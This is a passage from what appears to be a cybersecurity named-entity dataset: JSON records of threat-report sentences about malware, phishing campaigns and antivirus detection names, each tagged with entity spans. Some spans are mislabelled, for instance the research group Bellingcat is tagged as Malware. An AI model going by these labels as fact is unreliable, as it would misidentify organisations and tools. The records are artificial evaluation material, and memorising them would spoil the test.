"cyner2_valid"}} {"text": "A backdoor also known as: JS/Crypted.LS JS/Exploit.Pdfka.OYP Exploit.JS.Pdfka.ffn Exploit.Script.Heuristic-pdf.gutws Exploit.PDF.1988 HEUR_PDFEXP.B BehavesLike.PDF.Evasion.cr PDF/Obfusc.F!Camelot EXP/Pidief.aag.28 Exploit:JS/ShellCode.AF Exploit.JS.Pdfka.ffn", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001000", "source": "cyner2_valid"}} {"text": "The threat actor used Cobalt Strike, AdFind to gather AD information, exploited the Zero Logon vulnerability CVE-2020-1472, and deployed Quantum ransomware using PSExec.", "spans": {"Malware: Cobalt Strike, AdFind": [[22, 43]], "Vulnerability: exploited the Zero Logon vulnerability": [[70, 108]], "Malware: Quantum ransomware": [[137, 155]], "Malware: PSExec.": [[162, 169]]}, "info": {"id": "cyner2_valid_001001", "source": "cyner2_valid"}} {"text": "It was seen around 2015:02:18.", "spans": {}, "info": {"id": "cyner2_valid_001002", "source": "cyner2_valid"}} {"text": "CLOAKING Client-side Carrier Checks In our basic command & control example above , we didn ’ t address the ( incorrectly labeled ) “ imei ” field .", "spans": {}, "info": {"id": "cyner2_valid_001003", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.W.Sircam.l8kk Heur.Corrupt.PE Worm[Email]/Win32.Sircam Worm:Win32/Sircam.D@mm.dam#2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001004", "source": "cyner2_valid"}} {"text": "Characterized by relatively unsophisticated technical merit and extensive use of spear phishing, the group targeted individuals and organizations in the Middle East including targets inside Iran itself, as well as across Europe and in the United States.", "spans": {"Organization: individuals": [[116, 127]], "Organization: organizations": [[132, 145]]}, "info": {"id": "cyner2_valid_001005", "source": "cyner2_valid"}} {"text": "Once the observed Gmail account was under their control, the actors then forwarded malware to over a hundred of their 
contacts, ranging from an address for the United Nations Refugee Agency in Turkey to a site contact for Reza Pahlavi, the son of the deposed Shah Mohammad Reza Pahlavi.", "spans": {"Malware: malware": [[83, 90]], "Organization: contacts,": [[118, 127]], "Organization: the United Nations Refugee": [[156, 182]]}, "info": {"id": "cyner2_valid_001006", "source": "cyner2_valid"}} {"text": "In red , we see those values being passed into the suspicious Java method through the registered interface .", "spans": {}, "info": {"id": "cyner2_valid_001010", "source": "cyner2_valid"}} {"text": "While investigating a recent security incident, Unit 42 found a webshell that we believe was used by the threat actor to remotely access the network of a targeted Middle Eastern organization.", "spans": {"Organization: Unit 42": [[48, 55]], "System: webshell": [[64, 72]], "Organization: Middle Eastern organization.": [[163, 191]]}, "info": {"id": "cyner2_valid_001011", "source": "cyner2_valid"}} {"text": "After the profile is installed , the user will then be redirected to another Apple phishing site .", "spans": {"Organization: Apple": [[77, 82]]}, "info": {"id": "cyner2_valid_001012", "source": "cyner2_valid"}} {"text": "Lookout researchers have been tracking this threat for the last month .", "spans": {"Organization: Lookout": [[0, 7]]}, "info": {"id": "cyner2_valid_001013", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32/Pate.dr Backdoor.Bot W32/Eyeveg.f I-Worm.Eyeveg!zj+VAcYzzNU W32.Lanieca.A@mm Win32/Eyeveg.I Email-Worm.Win32.Eyeveg.f Trojan.Win32.Eyeveg.haym Win32.Worm-email.Eyeveg.Wtxf Win32.HLLW.Eyeveg.2 Worm.Eyeveg.Win32.18 BehavesLike.Win32.Sality.lc I-Worm/Eyeveg.g TR/Dldr.Small.atx.1 W32/Eyeveg.F@mm Worm[Email]/Win32.Eyeveg W32.W.Eyeveg.f!c Worm/Win32.IRCBot Worm:Win32/Eyeveg.E Trojan.BHORA.05647 W32/Eyeveg.D.worm I-Worm.Eyeveg.I Worm/Eyeveg.M Worm.Win32.Eyeveg.I", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001014", "source": 
"cyner2_valid"}} {"text": "If the user has launched Play Market , the Trojan intercepts the event and displays a window on top of the Google Play window , prompting the user to enter his/her bank card details in the fake window .", "spans": {"System: Play Market": [[25, 36]], "System: Google Play": [[107, 118]]}, "info": {"id": "cyner2_valid_001016", "source": "cyner2_valid"}} {"text": "Recently, Cyphort Labs received multiple malware samples that were used to target a financial institution in Asia.", "spans": {"Organization: Cyphort Labs": [[10, 22]], "Malware: malware": [[41, 48]], "Organization: financial institution": [[84, 105]]}, "info": {"id": "cyner2_valid_001017", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.MosquitoQKK.Fam.Trojan Backdoor/W32.Winker.35840 W32/Risk.KYQV-3380 Backdoor.Trojan BKDR_WINKER.J Win.Trojan.Winker-3 Backdoor.Win32.Winker.j Trojan.Win32.Winker.ejnu Backdoor.W32.Winker.j!c Backdoor.Win32.Winker.J BackDoor.Winker Backdoor.Winker.Win32.3 BKDR_WINKER.J BehavesLike.Win32.Mydoom.nc TrojanDownloader.ZMailBody Trojan[Backdoor]/Win32.Winker Trojan.Heur.PT.cmGfb4TaW3pb Backdoor.Win32.Winker.j Backdoor:Win32/Winker.H Trojan/Win32.Winker.C262606 Backdoor.Winker Bck/Winker.B Win32/Winker.J Win32.Backdoor.Winker.Hqbx Backdoor.Winker!Rg36gBAv3uo", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001018", "source": "cyner2_valid"}} {"text": "On August 10 and 11, 2016, Mansoor received SMS text messages on his iPhone promising new secrets about detainees tortured in UAE jails if he clicked on an included link.", "spans": {"System: iPhone": [[69, 75]]}, "info": {"id": "cyner2_valid_001021", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.HfsAutoB.DBB5 Backdoor.Win32.Torr!O Backdoor/Torr.lgj Backdoor.Trojan Trojan.Win32.Torr.bjcnz Backdoor.Win32.Popwin.~IQ BackDoor.Bull BehavesLike.Win32.Trojan.qc Backdoor:Win32/Yonsole.B Backdoor/Win32.Hupigon.C90957 Backdoor.Torr Trojan.MalPack.NSPack 
Backdoor.Win32.Hupigon Trj/CI.A Win32/Trojan.b8d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001022", "source": "cyner2_valid"}} {"text": "In April and July of 2017, Bankbot-infected apps were detected posing as entertainment and online banking apps on Google Play.", "spans": {"Malware: Bankbot-infected": [[27, 43]], "System: apps": [[44, 48]], "System: entertainment": [[73, 86]], "System: online banking apps": [[91, 110]], "System: Google Play.": [[114, 126]]}, "info": {"id": "cyner2_valid_001023", "source": "cyner2_valid"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817466 [ .", "spans": {}, "info": {"id": "cyner2_valid_001024", "source": "cyner2_valid"}} {"text": "GlassRAT's command and control structure has exhibited brief overlap with C2 that was identified in campaigns associated with malware originally reported in 2012 that targeted government and military organizations in the Pacific Region.", "spans": {"Malware: GlassRAT's": [[0, 10]], "System: structure": [[31, 40]], "System: C2": [[74, 76]], "Malware: malware": [[126, 133]], "Organization: targeted government": [[167, 186]], "Organization: military organizations": [[191, 213]]}, "info": {"id": "cyner2_valid_001025", "source": "cyner2_valid"}} {"text": "In March of this year, Unit 42 investigated the SamSa actors that were attacking the healthcare industry with targeted ransomware.", "spans": {"Organization: Unit 42": [[23, 30]], "Organization: healthcare industry": [[85, 104]], "Malware: ransomware.": [[119, 130]]}, "info": {"id": "cyner2_valid_001026", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.3923 Trojan.Zbot.AM4 Trojan.Extension.Exploit Trojan.Kryptik.Win32.572826 Trojan/Kryptik.cgut BKDR_SHARIK.SMA3 Win32.Trojan.Kryptik.ho W32/Zbot.CAJ BKDR_SHARIK.SMA3 Packed.Win32.Krap.ae Trojan.Win32.Krap.dcjtjs Packer.W32.Krap.ae!c trojandropper.win32.gepys.a BehavesLike.Downloader.dc W32/Zbot.REWN-4435 Packed.Krap.euzr 
W32/Cryptodef.PD!tr Trojan[Packed]/Win32.Krap Trojan.Kazy.D657FD Packed.Win32.Krap.ae Trojan:Win32/Ropest.B Trojan/Win32.Necurs.R116179 Win32.Packed.Krap.Ajbo Trojan.Kryptik!bJOkWg4AxxQ Crypt.Win32.Krypti7 Win32/Herz.B Win32/Trojan.19b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001027", "source": "cyner2_valid"}} {"text": "Last but not least , all the overlay screens ( injects ) for the banks include two steps ; first stealing the victim ’ s login credentials , then their credit card details .", "spans": {}, "info": {"id": "cyner2_valid_001028", "source": "cyner2_valid"}} {"text": "Servers acting as command and control for TelsaCrypt variants.", "spans": {"System: Servers": [[0, 7]], "Malware: TelsaCrypt variants.": [[42, 62]]}, "info": {"id": "cyner2_valid_001029", "source": "cyner2_valid"}} {"text": "It will also install the malicious app “ com.qualcmm.timeservices. ” These archives contain the file “ .root.sh ” which has some comments in Chinese : Main phase In this phase , the Trojan launches the “ start ” file from Game324.res or Game644.res .", "spans": {}, "info": {"id": "cyner2_valid_001030", "source": "cyner2_valid"}} {"text": "By using Google Cloud Messaging botnet owners can operate without a C & C server , thus eliminating the threat of the botnet being detected and blocked by law enforcement authorities .", "spans": {"System: Google Cloud Messaging": [[9, 31]]}, "info": {"id": "cyner2_valid_001031", "source": "cyner2_valid"}} {"text": "A backdoor also known as: VBS.Dunihi Trojan.Script.Autorun.dmmmnm Trojan-Downloader.JS.Nemucod", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001032", "source": "cyner2_valid"}} {"text": "Record phone calls audio in 3gp format .", "spans": {}, "info": {"id": "cyner2_valid_001033", "source": "cyner2_valid"}} {"text": "Map of potential targets Early samples of FrozenCell used an online service for storing geolocation information of infected devices .", "spans": 
{"Malware: FrozenCell": [[42, 52]]}, "info": {"id": "cyner2_valid_001034", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Mamianune.A Virus/W32.Mamianune Win32.Virus.Mamianune.a W32.Mamianune Win32/Ratab.A PE_GORONT.A Win32.Mamianune.A Email-Worm.Win32.Mamianune.lf Win32.Mamianune.A W32.W.Mamianune.lJsP Virus.Win32.Mamianune.A Win32.Mamianune.A PE_GORONT.A W32/Worm.RataB.6363 Worm[Email]/Win32.Mamianune.lf Win32.Mamianune.A Email-Worm.Win32.Mamianune.lf Virus.Manunya.11907 Win32.Mamianune.A Win32/Mamianune.A Virus.Win32.Mamianune_infected.if W32/Mamianune.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001035", "source": "cyner2_valid"}} {"text": "If the value does not match , the app skips the “ disclosure ” page and billing process and brings the user straight to the app content .", "spans": {}, "info": {"id": "cyner2_valid_001037", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9990 W32.Shadesrat Trojan.MSIL.Crypt.gamf Trojan.DownLoader5.3395 Trojan.Injector.Win32.74630 BehavesLike.Win32.PWSZbot.fc WORM/Ainslot.A.706 Trojan.Strictor.D12CFF Trojan.MSIL.Crypt.gamf Trojan:MSIL/MalLoader.A Trojan/Win32.Inject.C160327 Trojan.Llac Win32.Trojan.Jorik.Lkdt Trojan.Win32.Inject Win32/Trojan.401", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001039", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Downloader.Shelcod.A Trojan-Exploit/W32.MS08-067.16384.H Exploit.Win32.MS08-067!O Trojan/Exploit.MS08-067.dw Trojan.Downloader.Shelcod.A Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Moo Win32/SMBloz.A Win.Exploit.MS08-1 Trojan.Downloader.Shelcod.A Trojan.Downloader.Shelcod.A Trojan.Win32.DownLoad1.bdwuil Trojan.Win32.EX-MS08-067.16384.L Trojan.Downloader.Shelcod.A Trojan.Downloader.Shelcod.A Trojan.DownLoad1.17537 Exploit.MS08.Win32.402 Exploit.MS08-067.jq TR/Expl.MS08-067.DW Win32.EXPLOIT.MS08-067.dw.kcloud 
Exploit.W32.MS08-067.dw!c Trojan.Downloader.Shelcod.A Exploit.MS08067 Win32.Exploit.Ms08-067.bltx Exploit.MS08-067!xVSxDtd39IM Exploit.Win32.MS08-067 W32/MS08_067.DW!exploit Win32/Trojan.Exploit.59a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001040", "source": "cyner2_valid"}} {"text": "Inside this file, we found a .lnk file, which after executing uses PowerShell to download a second stage of malware.", "spans": {"Malware: second stage of malware.": [[92, 116]]}, "info": {"id": "cyner2_valid_001041", "source": "cyner2_valid"}} {"text": "Android banker PaloAlto Retefe is one of the most targeted banking Trojans currently in the wild.", "spans": {"Malware: Android banker": [[0, 14]], "Organization: PaloAlto": [[15, 23]], "Malware: Retefe": [[24, 30]], "Organization: banking": [[59, 66]], "Malware: Trojans": [[67, 74]]}, "info": {"id": "cyner2_valid_001042", "source": "cyner2_valid"}} {"text": "The RAT delivered by this campaign was not particularly interesting and had all the features you would expect in such a tool.", "spans": {"Malware: RAT": [[4, 7]], "Malware: tool.": [[120, 125]]}, "info": {"id": "cyner2_valid_001043", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Graftor.D3CD95 BehavesLike.Win32.PUPXAO.cc TrojanDownloader:Win32/Strumapine.A Trojan-Downloader.Win32.Banload", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001044", "source": "cyner2_valid"}} {"text": "The Ohagi malware is a short and basic piece of code, providing its operator extensive information about the target machine, possibly for optimizing future attacks and enhancing survivability of later stages of an assault on the victim's systems.", "spans": {"Malware: The Ohagi malware": [[0, 17]], "System: target machine,": [[109, 124]], "System: victim's systems.": [[229, 246]]}, "info": {"id": "cyner2_valid_001045", "source": "cyner2_valid"}} {"text": "Here are some significant updates to Vawtrak: The malware now 
includes a DGA.", "spans": {"Malware: Vawtrak: The malware": [[37, 57]]}, "info": {"id": "cyner2_valid_001046", "source": "cyner2_valid"}} {"text": "Many documents call out to tetrasecured[.]com/word/webstat/image.php?id= sinkholed by AlienVault to track when they are opened.", "spans": {"Organization: AlienVault": [[86, 96]]}, "info": {"id": "cyner2_valid_001047", "source": "cyner2_valid"}} {"text": "It is less common, and this fact may allow it to slip unnoticed by administrators and researchers.", "spans": {}, "info": {"id": "cyner2_valid_001048", "source": "cyner2_valid"}} {"text": "As outlined in our original posting, the DealersChoice exploitation platform generates malicious RTF documents which in turn use embedded OLE Word documents.", "spans": {"Malware: malicious RTF documents": [[87, 110]]}, "info": {"id": "cyner2_valid_001050", "source": "cyner2_valid"}} {"text": "Along with creating hourly scheduled tasks, the adware also has the potential to download additional malicious code and direct the user to compromised websites.", "spans": {"Malware: adware": [[48, 54]]}, "info": {"id": "cyner2_valid_001051", "source": "cyner2_valid"}} {"text": "In December 2022, Nevada ransomware was advertised in criminal forums.", "spans": {"Malware: Nevada ransomware": [[18, 35]]}, "info": {"id": "cyner2_valid_001052", "source": "cyner2_valid"}} {"text": "A backdoor also known as: P2P-Worm.Win32!O Win32.Trojan.WisdomEyes.16070401.9500.9898 W32/Furby.A@p2p WORM_FURBY.A Win.Worm.Furby-2 P2P-Worm.Win32.Furby Trojan.Win32.Furby.empc Worm.Win32.P2P-Furby.81920 Worm.Win32.Furby.A Trojan.StartPage1.4893 WORM_FURBY.A W32/Furby.YYNU-6008 Worm/P2P.Furby Worm[P2P]/Win32.Furby Worm:Win32/Furby.A P2P-Worm.Win32.Furby HEUR/Fakon.mwf Worm.Furby Win32/Furby.A Worm.P2P.Furby W32/FURBY.A!worm.p2p W32/Byfur.A.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001053", "source": "cyner2_valid"}} {"text": "As a result , the Trojan delete button in the list of 
applications becomes inactive , which may cause problems for inexperienced users .", "spans": {}, "info": {"id": "cyner2_valid_001054", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Tofsee.av Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_ZBPAK.SML2 Trojan.Win32.DownLoad3.cxnnmp TrojWare.Win32.Kryptik.BAXQ Trojan.DownLoad3.21597 Trojan.Zbot.Win32.117645 TSPY_ZBPAK.SML2 BehavesLike.Win32.ICLoader.kh Trojan[Spy]/Win32.Zbot Trojan.Renos.43 TrojanDownloader:Win32/Tofsee.D BScope.Malware-Cryptor.SB.01798 Trj/Hexas.HEU Win32/Tofsee.AV Trojan.Win32.Yakes W32/Zbot.FG!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001055", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Worm.TUC Trojan.Folcom Win32.Worm.TUC W32.SillyFDC Win32.Worm.TUC Win32.Worm.TUC TrojWare.Win32.Injector.XYNZ Trojan.MulDrop5.40123 Win32.Worm.TUC Trojan:Win32/Folcom.A Trojan/Win32.Folcom.R158004 Win32.Worm.TUC", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001056", "source": "cyner2_valid"}} {"text": "The Securonix Threat Research team has identified an ongoing hyper-targeted phishing campaign TACTICAL#OCTOPUS targeting individuals in the US using seemingly valid tax forms and contracts.", "spans": {"Organization: The Securonix Threat Research team": [[0, 34]], "Organization: individuals": [[121, 132]]}, "info": {"id": "cyner2_valid_001058", "source": "cyner2_valid"}} {"text": "A backdoor also known as: PWS-OnlineGames.cn Trojan.Win32.Vaklik.srhd W32/Trojan2.BDOH Vaklik.ATF Trojan.Spy-47164 Trojan.Win32.Vaklik.bha Trojan.Vaklik.K Trojan.Win32.Vaklik.15917 TrojWare.Win32.Magania.~AP Trojan.Vaklik.K Trojan.MulDrop.17281 PWS-OnlineGames.cn Trojan:Win32/Vaklik.A Trojan/Win32.OnlineGameHack Trojan.Vaklik.K W32/Trojan.CNYI-4128 Trojan.Win32.Vaklik W32/OnlineGames.BHA!tr Trj/Lineage.LET", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001059", "source": "cyner2_valid"}} {"text": "A 
backdoor also known as: WS.Reputation.1 Trojan.DownLoader11.18813", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001060", "source": "cyner2_valid"}} {"text": "According to our data , 0.4 % of the websites visited by users of our products were compromised sites .", "spans": {}, "info": {"id": "cyner2_valid_001062", "source": "cyner2_valid"}} {"text": "FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "cyner2_valid_001063", "source": "cyner2_valid"}} {"text": "Svpeng is only currently attacking clients of Russian banks .", "spans": {"Malware: Svpeng": [[0, 6]]}, "info": {"id": "cyner2_valid_001064", "source": "cyner2_valid"}} {"text": "Both the Google Play Store pages and the decoys of the malicious apps are in Italian .", "spans": {"System: Google Play Store": [[9, 26]]}, "info": {"id": "cyner2_valid_001065", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Mdropper Win32.Mdropper Exploit.Rtf.based EXP/Rtf.E Trojan:Win32/Rtfdrop.C Trojan.Mdropper Data/CVE20103333.A!exploit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001066", "source": "cyner2_valid"}} {"text": "] com hxxp : //mailsa-qaf [ .", "spans": {}, "info": {"id": "cyner2_valid_001067", "source": "cyner2_valid"}} {"text": "And TikTok is no exception .", "spans": {"System: TikTok": [[4, 10]]}, "info": {"id": "cyner2_valid_001068", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Demtranc.aa BKDR_DEMTRANC.C Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Risk.XJQA-1744 Backdoor.Trojan BKDR_DEMTRANC.C W32/MalwareF.HOCF Trojan:Win32/Demtranc.C Trojan:Win32/Demtranc.C Trojan/Win32.Demtranc.R196 Trojan-PWS.Win32.Small W32/Demtranc.AA!tr Win32/Trojan.b7f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001069", 
"source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.FakeFolder Win32.Trojan.WisdomEyes.16070401.9500.9943 Trojan.Win32.CFI.cqhtqx Trojan.MulDrop5.19111 Trojan/Krastic.a Worm:Win32/YahLover.K Trojan.Heur.FmGfrnQe6hhib HEUR/Fakon.mwf Trojan.Win32.Spy", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001070", "source": "cyner2_valid"}} {"text": "Permissions The package name follows the original style name used on DenDroid .", "spans": {"Malware: DenDroid": [[69, 77]]}, "info": {"id": "cyner2_valid_001071", "source": "cyner2_valid"}} {"text": "All of this is possible because of its modular nature.", "spans": {}, "info": {"id": "cyner2_valid_001072", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Spy/W32.ZBot.1251328 TROJ_HPUTOTI.SMQ Win32.Trojan.WisdomEyes.16070401.9500.9590 W32.Golroted Trojan-Spy.Win32.Zbot.yopt Trojan.Win32.Z.Zbot.1251328 Troj.Spy.W32.Zbot!c Trojan.PWS.Stealer.19347 TR/AD.Inject.pfzxb Trojan-Spy.Win32.Zbot.yopt Trj/CI.A Trojan.Inject AutoIt/Injector.DCY!tr Win32/Trojan.01c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001073", "source": "cyner2_valid"}} {"text": "Threatstream Labs came across an interesting FrameworkPOS sample that, although it is two months old, is still digitally signed and its certificate hasn't been revoked.", "spans": {"Organization: Threatstream Labs": [[0, 17]], "Malware: FrameworkPOS": [[45, 57]]}, "info": {"id": "cyner2_valid_001074", "source": "cyner2_valid"}} {"text": "Threat actors delivered the same document via spear-phishing emails to both organizations.", "spans": {"Organization: organizations.": [[76, 90]]}, "info": {"id": "cyner2_valid_001075", "source": "cyner2_valid"}} {"text": "The attack involved a spear-phishing email sent to a single French diplomat based in Taipei, Taiwan and contained an invitation to a Science and Technology support group event.", "spans": {"Organization: French diplomat": [[60, 75]]}, "info": {"id": 
"cyner2_valid_001076", "source": "cyner2_valid"}} {"text": "The additional commands that attackers can carry out via a socket connection ( top ) and the key used to encrypt the stolen data ( bottom ) Correlating Bouncing Golf 's Activities We monitored Bouncing Golf ’ s C & C-related activities and saw that the campaign has affected more than 660 devices as of this writing .", "spans": {"Malware: Bouncing Golf": [[152, 165], [193, 206]]}, "info": {"id": "cyner2_valid_001077", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.FulicoLTQ.Trojan Worm.RJump.A Worm/W32.RJump.3514318.B Worm.RJump.A Worm.RJump.Win32.1 W32/RJump.g Worm.RJump.A W32/RJump.D W32.Rajump Win32/RJump.D WORM_RJUMP.A Win.Worm.RJump-4 Worm.RJump.A Worm.Win32.RJump.a Worm.RJump.A Trojan.RJump.ghkp Worm.Win32.RJump.3514318 W32.W.RJump.kZfP Worm.RJump.A Worm.Win32.RJump.A0 Trojan.Iespy WORM_RJUMP.A W32/RJump.worm Worm.Win32.RJump W32/RJump.AKZT-0686 Trojan/StartPage.fo Worm:Win32/Rjump.J Worm/Win32.RJump.a Worm:Win32/RJump.J Worm.Win32.RJump.a Worm/Win32.RJump.R17519 W32/RJump.worm Bck/Ravmon.B Win32/RJump.A Win32.Worm.Rjump.Alsj Worm.RJump!KbA9JqtFC8g", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001079", "source": "cyner2_valid"}} {"text": "Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker .", "spans": {}, "info": {"id": "cyner2_valid_001081", "source": "cyner2_valid"}} {"text": "Gathered file Type Description lock Text Implant log ldata sqlite3 Location data based on network ( cell_id ) gdata sqlite3 Location data based on GPS coordinates sdata sqlite3 SMS messages f.db sqlite3 Facebook messages v.db sqlite3 Viber messages w.db sqlite3 WhatsApp messages Among the other data gathered were SMS banking messages that revealed an account with a balance of more than US $ 10,000.But as far as we know , the attacker behind this campaign is not interested in stealing the victims ’ money 
.", "spans": {"System: Facebook": [[203, 211]], "System: Viber": [[234, 239]], "System: WhatsApp": [[262, 270]]}, "info": {"id": "cyner2_valid_001082", "source": "cyner2_valid"}} {"text": "In the unpacked core we found strings suggesting that the authors named the project Shakti, which means power in Hindi or may also be a reference to the Shakti goddess.", "spans": {}, "info": {"id": "cyner2_valid_001083", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Vasdek Win32.Trojan.Graftor.Lneg Backdoor.Win32.Hupigon Trojan.Graftor.D48DBE RiskWare.HangVote! Win32/Trojan.97a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001084", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.NSIS.Sinis.A Nsis.Dropper.Cv!c Trojan.Carberp.663 TrojanDownloader:Win32/Sinis.C Trj/CI.A W32/Dx.BCQS!tr Win32/Trojan.Dropper.552", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001085", "source": "cyner2_valid"}} {"text": "Figure 2 – Granting Permissions The following permissions are granted to the app : Figure 3 – Permissions Granted to App A closer look at the code reveals the application gathers a list of installed applications to compare the results against a list of targeted applications ( Figure 4 ) .", "spans": {}, "info": {"id": "cyner2_valid_001086", "source": "cyner2_valid"}} {"text": "Asacub versions Sewn into the body of the Trojan is the version number , consisting of two or three digits separated by periods .", "spans": {"Malware: Asacub": [[0, 6]]}, "info": {"id": "cyner2_valid_001087", "source": "cyner2_valid"}} {"text": "In this case paying the attackers will not help get any files back.", "spans": {}, "info": {"id": "cyner2_valid_001088", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.CHM.Downloader.5065 Exploit.CHM.Downloader HTML.Trojan-Downloader.Posh.D Exploit.Chm.Downloader!c HEUR_CHM.E Exploit:Win32/Trupto.A Exploit.Win32.Trupto Win32/Trojan.Exploit.4f5", 
"spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001089", "source": "cyner2_valid"}} {"text": "Forcepoint Security Labs™ recently encountered a strain of attacks that appear to target Pakistani nationals.", "spans": {"Organization: Forcepoint Security Labs™": [[0, 25]], "Organization: Pakistani nationals.": [[89, 109]]}, "info": {"id": "cyner2_valid_001090", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Prorat-19.fwto W32/TrojanX.CKO BKDR_AVW.A Trojan.MulDrop.1246 BKDR_AVW.A W32/Trojan.BGRF-7808 WORM/Prorat.351276 BScope.Trojan.Dropper.we Trojan.Win32.Dropper.Aouw Backdoor.Win32.Prorat", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001091", "source": "cyner2_valid"}} {"text": "Pin request overlay This overlay asks the user to provide their PIN to unlock the mobile device , which is immediately exfiltrated to the C2 .", "spans": {}, "info": {"id": "cyner2_valid_001092", "source": "cyner2_valid"}} {"text": "Therefore, the Korea Financial Security Institute FSI identified the specific characteristics of domestic IT and work environment, and profiled specific threat groups that are using the attacks.", "spans": {"Organization: the Korea Financial Security Institute FSI": [[11, 53]], "Organization: domestic IT": [[97, 108]], "Organization: work environment,": [[113, 130]]}, "info": {"id": "cyner2_valid_001093", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Heur.Packed.Unknown FakeAlert.PY", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001094", "source": "cyner2_valid"}} {"text": "Upon creation the class will start to take screenshots that will be stopped and uploaded to the C2 once the service ca n't find the targeted applications running .", "spans": {}, "info": {"id": "cyner2_valid_001095", "source": "cyner2_valid"}} {"text": "It is also able to move code execution into different locations if needed .", "spans": {}, "info": {"id": 
"cyner2_valid_001096", "source": "cyner2_valid"}} {"text": "A complete list of hashes can be found here .", "spans": {}, "info": {"id": "cyner2_valid_001097", "source": "cyner2_valid"}} {"text": "We also found that recent publications on the group's activity have done nothing to change their behavior or reduce their activity.", "spans": {}, "info": {"id": "cyner2_valid_001098", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Udsdangerousobject.Multi BackDoor-EPJ.a Trojan/Delf.ajsi BKDR_DELF.SMR Win32.Trojan.WisdomEyes.16070401.9500.9989 Backdoor.Trojan BKDR_DELF.SMR Win.Trojan.Delf-20678 Trojan.Win32.Delf.brsrqp Trojan.Win32.Z.Delf.836986 Trojan.Delf.Win32.27370 BehavesLike.Win32.Dropper.ch Trojan/Delf.nbp Win32.Troj.DelfCode.ab.kcloud Trojan.Graftor.D6F46 Backdoor:Win32/Exsorv.A Trojan/Win32.Delf.R48296 Win32.Trojan.Delf.Eerb Trojan.Delf!+mMB+iIfbgw W32/Delf.NTBZ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001099", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Dynamer.S18607 Trojan.Razy.D39CC3 Win32.Trojan.WisdomEyes.16070401.9500.9989 TSPY_ZBOT_GA250A16.UVPM Trojan.Win32.Panda.elkrhc Trojan.Win32.Z.Zbot.143360.ET Trojan.PWS.Panda.11620 Trojan.Zbot.Win32.198737 TSPY_ZBOT_GA250A16.UVPM BehavesLike.Win32.TrojanShifu.ch TrojanDownloader:Win32/Macapy.A!bit BScope.Trojan-Spy.Zbot Win32.Trojan.Downloader.Wtxj Win32/Trojan.Downloader.18b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001100", "source": "cyner2_valid"}} {"text": "Using the ThreatConnect platform we ingested the spear-phishing emails Bellingcat provided, processed out the relevant indicators, and compared them to previously known Fancy Bear activity.", "spans": {"System: the ThreatConnect platform": [[6, 32]], "Malware: Bellingcat": [[71, 81]]}, "info": {"id": "cyner2_valid_001101", "source": 